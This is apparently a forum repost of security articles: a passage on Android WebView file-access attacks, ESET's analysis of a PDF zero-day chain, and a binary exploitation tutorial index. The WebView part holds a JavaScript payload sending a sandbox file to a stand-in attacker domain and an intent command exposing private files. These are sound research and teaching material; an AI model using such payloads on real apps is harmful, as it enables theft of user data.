manipulate the content. Our goal is to exfiltrate content from the app so our best option is to use Javascript to do so. Using an XMLHttpRequest seems the best way to do that. The attacker can try and replace the content returned to the app with a Javascript payload that would seemingly allow to exfiltrate files: var xhr = new XMLHttpRequest(); xhr.onreadystatechange = function() { if (xhr.readyState == XMLHttpRequest.DONE) { window.location.replace('https://attackerdomain.com/?exfiltrated='+xhr.responseText); } } xhr.open('GET', 'file:///data/data/pt.integrity.labs.webview_remote/files/sandbox_file.txt', true); xhr.send(null); The attacker will be able to see the HTTP request but without exfiltrated data. If we look into the system logs we discover why. 05-09 12:38:59.306 27768 27768 I chromium: [INFO:CONSOLE(20)] “Failed to load file:///data/data/pt.integrity.labs.webview_remote/files/sandbox_file.txt: Cross origin requests are only supported for protocol schemes: http, data, chrome, https.”, source: https://labs.integrity.pt/ (20) On earlier API versions like 15 (Ice Cream Sandwich 4.0.3 - 4.0.4) a similar error is returned: Console: XMLHttpRequest cannot load file:///data/data/pt.integrity.labs.webview_remote/files/sandbox_file.txt. Cross origin requests are only supported for HTTP. null:1 Console: Uncaught Error: NETWORK_ERR: XMLHttpRequest Exception 101 https://labs.integrity.pt/:39 So even with file access enabled in the WebView, due to the fact that the file scheme request is considered a Cross Origin Request and hence disallowed, the attacker will not be able to exfiltrate files this way. Scenario 2: App with WebView that loads local HTML files via file scheme with external resources which the attacker is able to intercept and manipulate. Javascript enabled. In this scenario, the HTML files are stored locally in the APK and are loaded via file scheme, but some resources are loaded externally. There is a very important property called UniversalAccessFromFileURLs that allows SOP bypass. This property indicates whether Javascript running in the context of a file scheme can access content from any origin. This property is enabled by default below API 16 (Jelly Bean 4.1.x) and there is no way to disable it on those API levels [1]. In API 16 (Jelly Bean 4.1.x) and afterwards the property is disabled by default. The method setAllowUniversalAccessFromFileURLs() was also made available to explicitly enable or disable this feature. Using the same Javascript payload, the attack will succeed in devices that are running on API 15 and below, or in apps that explicitly enable the property using the method setAllowUniversalAccessFromFileURLs(). The attack succeeds due to the fact that the app is running Javascript in the context of an HTML file loaded with a file scheme and the UniversalAccessFromFileURLs property is enabled, allowing SOP bypass. Scenario 3: App with exported component that opens URLs via Intent. Backup disabled. Access to External Storage. In this scenario, the app has an exported activity, then receives URLs via Intents, and opens the respective URL. This is very common in apps that are using Deep Links. When intent-filters are not correctly implemented this can cause security issues. The app also has Backup disabled, preventing an attacker to obtain access to the app’s sandbox content via the backup file. Here the attack vectors are a bit trickier and far-fetched, but still possible. Scenario 3 - Physical Attack One possible attack vector is someone that has physical access to a unlocked device, already knows in advanced the structure of the vulnerable app (consider an hypothetical well known app, with a large user base), and session cookies or plaintext credentials are stored in the app’s sandbox. The attacker can install a custom app sending a targeted Intent for the file with sensitive information or install a terminal emulator from Google Play and type in the following command: am start -n pt.integrity.labs.webview_intents/.ExportedActivity –es url “file:///data/data/pt.integrity.labs.webview_intents/files/sandbox_file.txt” This will trigger the vulnerable app and the WebView is going to show the content of the sensitive file on the screen. Without rooting the device it is possible to obtain access to the content of the app’s sandbox. Scenario 3 - Malicious App This attack requires that the vulnerable app is running on a device below API 16 or the app has explicitly enabled UniversalAccessFromFileURLs An attacker lures the user to install a malicious app that only needs android.permission.INTERNET and android.permission.READ_EXTERNAL_STORAGE permissions. When started, the malicious app creates an HTML file in the external storage with a Javascript payload identical to the one used in scenarios 1 and 2. Afterwards, it sends an Intent to the vulnerable app containing the URL of the local HTML (previously created in the external storage). This will allow it to exfiltrate the information from inside the vulnerable app’s sandbox like in scenario 2. Test Apps I’ve created the apps for all scenarios so you can play around and test this for yourselves. Scenario 1 - https://github.com/integrity-sa/android-webviews-fileaccess/blob/master/webview_remote_scenario1.apk Scenario 2 - https://github.com/integrity-sa/android-webviews-fileaccess/blob/master/webview_local_scenario2.apk Scenario 3 - https://github.com/integrity-sa/android-webviews-fileaccess/blob/master/webview_intents_scenario3.apk Scenario 3 Exploit App - https://github.com/integrity-sa/android-webviews-fileaccess/blob/master/webview_intents_scenario3_exploit.apk Note1: All apps have broken TLS implementation so it’s easier to intercept the communication. If using Burp Suite, for scenario 2, ensure that you adjust the Intercept Client Requests rules so that you can intercept Javascript content. Note2: While exploring the vulnerability in Scenario 2 and 3 (both vulnerable app and exploit) you will need to clear the data (Settings->Apps->App->Clear Data) when trying to repeat the attack. Note3: On Scenario 3 Malicious App, start the vulnerable app a first time and only then run the exploit app. Conclusion WebViews with file access enabled can have a big impact in a particular application’s security but, by itself, a WebView with file access enabled does not guarantee a practical way to exfiltrate files from the system. For the attack to work it is required that the app is running on a device with API level < 16 and/or the app developer improperly used the Android platform as demonstrated in some of the scenarios above. These were the attack vectors that I could identify but if I missed a particular one, I would love to discuss it and add it here. Ping me at https://twitter.com/clviper. Recommendations: Ensure that all external external resources loaded by a WebView are using TLS and the app has a correct TLS implementation. Ensure that all exported components that might need to receive intents and trigger a WebView to open that URL are correctly filtered by using intent-filters and a data element for a fine filter of the allowed URIs. Ensure that all WebViews explicitly disable file access when not a requirement by using the method setAllowFileAccess(). In API Level >=16, when not a requirement, ensure that no WebView enables the UniversalAccessFromFileURLs by using the method setAllowUniversalAccessFromFileURLs(). References https://en.wikipedia.org/wiki/Same-origin_policy https://source.android.com/setup/start/build-numbers https://developer.android.com/reference/android/webkit/WebView https://developer.android.com/reference/android/webkit/WebSettings https://developer.android.com/guide/components/intents-filters https://developer.android.com/guide/topics/manifest/data-element https://github.com/OWASP/owasp-mstg/blob/master/Document/0x05h-Testing-Platform-Interaction.md#testing-webview-protocol-handlers Notes [1] Currently the Android developer documentation has the following paragraph: To prevent possible violation of same domain policy when targeting ICE_CREAM_SANDWICH_MR1 and earlier, you should explicitly set this value to false. I’ve opened an issue on google issue tracker, since this paragraph needs to be adjusted. The public method setAllowUniversalAccessFromFileURLs() was only implemented in API 16, so it is not possible to use this method in API 15 (ICE_CREAM_SANDWICH_MR1) and earlier. Thank you Special thank you to pmsac and morisson for the post review. Written by Cláudio André Sursa: https://labs.integrity.pt/articles/review-android-webviews-fileaccess-attack-vectors/
-
A tale of two zero-days Double zero-day vulnerabilities fused into one. A mysterious sample enables attackers to execute arbitrary code with the highest privileges on intended targets Anton Cherepanov 15 May 2018 - 02:58PM Share Late in March 2018, ESET researchers identified an interesting malicious PDF sample. A closer look revealed that the sample exploits two previously unknown vulnerabilities: a remote-code execution vulnerability in Adobe Reader and a privilege escalation vulnerability in Microsoft Windows. The use of the combined vulnerabilities is extremely powerful, as it allows an attacker to execute arbitrary code with the highest possible privileges on the vulnerable target, and with only the most minimal of user interaction. APT groups regularly use such combinations to perform their attacks, such as in the Sednit campaign from last year. Once the PDF sample was discovered, ESET contacted and worked together with the Microsoft Security Response Center, Windows Defender ATP research team, and Adobe Product Security Incident Response Team as they fixed these bugs. Patches and advisories from Adobe and Microsoft are available here: APSB18-09 CVE-2018-8120 The affected product versions are the following: Acrobat DC (2018.011.20038 and earlier versions) Acrobat Reader DC (2018.011.20038 and earlier versions ) Acrobat 2017 (011.30079 and earlier versions) Acrobat Reader DC 2017 (2017.011.30079 and earlier versions) Acrobat DC (Classic 2015) (2015.006.30417 and earlier versions) Acrobat Reader DC (Classic 2015) (2015.006.30417 and earlier versions) Windows 7 for 32-bit Systems Service Pack 1 Windows 7 for x64-based Systems Service Pack 1 Windows Server 2008 for 32-bit Systems Service Pack 2 Windows Server 2008 for Itanium-Based Systems Service Pack 2 Windows Server 2008 for x64-based Systems Service Pack 2 Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1 Windows Server 2008 R2 for x64-based Systems Service Pack 1 This blog covers technical details of the malicious sample and the vulnerabilities it exploited. Introduction PDF (Portable Document Format) is a file format for electronic documents and as with other popular document formats, it can be used by attackers to deliver malware to a victim’s computer. In order to execute their own malicious code, attackers have to find and exploit vulnerabilities in PDF viewer software. There are several PDF viewers; one very popular viewer is Adobe Reader. The Adobe Reader software implements a security feature called a sandbox, also known in the viewer as Protected Mode. The detailed technical description of the sandbox implementation was published on Adobe’s blog pages in four parts (Part 1, Part 2, Part 3, Part 4). The sandbox makes the exploitation process harder: even if code execution is achieved, the attacker still would have to bypass the sandbox’s protections in order to compromise the computer running Adobe Reader. Usually, sandbox bypass is achieved by exploiting a vulnerability in the operating system itself. This is a rare case when the attackers were able to find vulnerabilities and write exploits for the Adobe Reader software and the operating system. CVE-2018-4990 – RCE in Adobe Reader The malicious PDF sample embeds JavaScript code that controls the whole exploitation process. Once the PDF file is opened, the JavaScript code is executed. At the beginning of exploitation, the JavaScript code starts to manipulate the Button1 object. This object contains a specially crafted JPEG2000 image, which triggers a double-free vulnerability in Adobe Reader. Figure 1. JavaScript code that manipulates the Button1 object The JavaScript uses heap-spray techniques in order to corrupt internal data structures. After all these manipulations the attackers achieve their main goal: read and write memory access from their JavaScript code. Figure 2. JavaScript code used for reading and writing memory Using these two primitives, the attacker locates the memory address of the EScript.api plugin, which is the Adobe JavaScript engine. Using assembly instructions (ROP gadgets) from that module, the malicious JavaScript sets up a ROP chain that would lead to the execution of native shellcode. Figure 3. Malicious JavaScript that builds a ROP chain As the final step, the shellcode initializes a PE file embedded in the PDF and passes execution to it. CVE-2018-8120 – Privilege escalation in Microsoft Windows After having exploited the Adobe Reader vulnerability, the attacker has to break the sandbox. This is exactly the purpose of the second exploit we are discussing. The root cause of this previously unknown vulnerability is located in the NtUserSetImeInfoEx function of the win32k Windows kernel component. Specifically, the SetImeInfoEx subroutine of NtUserSetImeInfoEx does not validate a data pointer, allowing a NULL pointer dereference. Figure 4. Disassembled SetImeInfoEx routine As is evident in Figure 4, the SetImeInfoEx function expects a pointer to an initialized WINDOWSTATION object as the first argument. The spklList could be equal to zero if the attacker creates a new window station object and assigns it to the current process in user-mode. Thus, by mapping the NULL page and setting a pointer to offset 0x2C, the attacker can leverage this vulnerability to write to an arbitrary address in the kernel space. It should be noted that since Windows 8, a user process is not allowed to map the NULL page. Since the attacker has arbitrary write primitive they could use different techniques, but in this case, the attacker chooses to use a technique described by Ivanlef0u and Mateusz “j00ru” Jurczyk and Gynvael Coldwin. The attacker sets up a call gate to Ring 0 by rewriting the Global Descriptor Table (GDT). To do so an attacker gets the address of the original GDT using the SGDT assembly instruction, constructs their own table and then rewrites the original one using the above-mentioned vulnerability. Then the exploit uses the CALL FAR instruction to perform an inter-privilege level call. Figure 5. The disassembled CALL FAR instruction Once the code is executed in kernel mode, the exploit replaces the token of the current process with the system token. Conclusion Initially, ESET researchers discovered the PDF sample when it was uploaded to a public repository of malicious samples. The sample does not contain a final payload, which may suggest that it was caught during its early development stages. Even though the sample does not contain a real malicious final payload, the author(s) demonstrated a high level of skills in vulnerability discovery and exploit writing. Indicators of Compromise (IoC) ESET detection names JS/Exploit.Pdfka.QNV trojan Win32/Exploit.CVE-2018-8120.A trojan SHA-1 hashes C82CFEAD292EECA601D3CF82C8C5340CB579D1C6 0D3F335CCCA4575593054446F5F219EBA6CD93FE Anton Cherepanov 15 May 2018 - 02:58PM Sursa: https://www.welivesecurity.com/2018/05/15/tale-two-zero-days/
-
Binary Exploitation Any Doubt...? Let's Discuss Introduction I am quite passionate about exploiting binary files. First time when I came across Buffer Overflow(a simple technique of exploitation) then I was not able to implement the same with the same copy of code on my system. The reason for that was there was no consolidated document that would guide me thoroughly to write a perfect exploit payload for the program in case of system changes. Also there are very few descriptive blogs/tutorials that had helped me exploiting a given binary. I have come up with consolidation of Modern exploitation techniques (in the form of tutorial) that will allow you to understand exploitation from scratch. I will be using vagrant file to setup the system on virtual box. To do the same in your system follow: vagrant up vagrant ssh Topics Lecture 1. Memory Layout of C program. ELF binaries. Overview of stack during function call. Assembly code for the function call and return. Concept of $ebp and $esp. Executable memory. Lecture 1.5. How Linux finds the binaries utilis? Simple exploit using Linux $PATH variable. Lecture 2. What are stack overflows? ASLR (basics), avoiding Stack protection. Shellcodes Buffer overflow: Changing Control of the program to return to some other function Shellcode injection in buffer and spawning the shell Lecture 3. Shellcode injection with ASLR enabled. Environment variables. Lecture 3.5 Return to Libc attacks. Spawning shell in non executable stack Stack organization in case ret2libc attack. Lecture 4. This folder contains the set of questions to exploit binaries on the concept that we have learned so far. Lecture 5. What is format string Vulnerability? Seeing the content of stack. Writing onto the stack. Writing to arbitrary memory location. Lecture 6. GOT Overriding GOT entry. Spawning shell with format string vuln. Sursa: https://github.com/r0hi7/BinExp
-
- 1
-